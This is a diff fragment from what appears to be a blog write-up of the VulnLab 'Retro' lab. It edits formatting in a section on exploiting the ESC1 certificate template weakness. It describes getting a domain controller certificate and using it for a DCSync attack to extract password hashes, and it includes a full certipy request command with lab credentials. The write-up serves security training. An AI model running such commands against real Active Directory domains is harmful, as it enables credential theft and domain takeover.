cyb4x/cyb4x.github.io/_posts/2025-04-19-VulnLab-Retro.md

 ### Exploting ESC1

-By default, the certificate request using this vulnerable template returns a .pfx file for the DC$ account.
-This certificate can then be used to perform a DCSync attack against the domain controller itself — allowing us to extract sensitive credentials like password hashes.
+By default, the certificate request using this vulnerable template returns a `.pfx` file for the `DC$` account.
+This certificate can then be used to perform a `DCSync` attack against the domain controller itself allowing us to extract sensitive credentials like password hashes.

 ```powershell
 certipy req -u 'BANKING$' -p 'Password123!' -dc-ip '10.10.79.94' -ca 'retro-DC-CA' -template 'RetroClients' -dns 'DC.retro.vl' -key-size 4096 -debug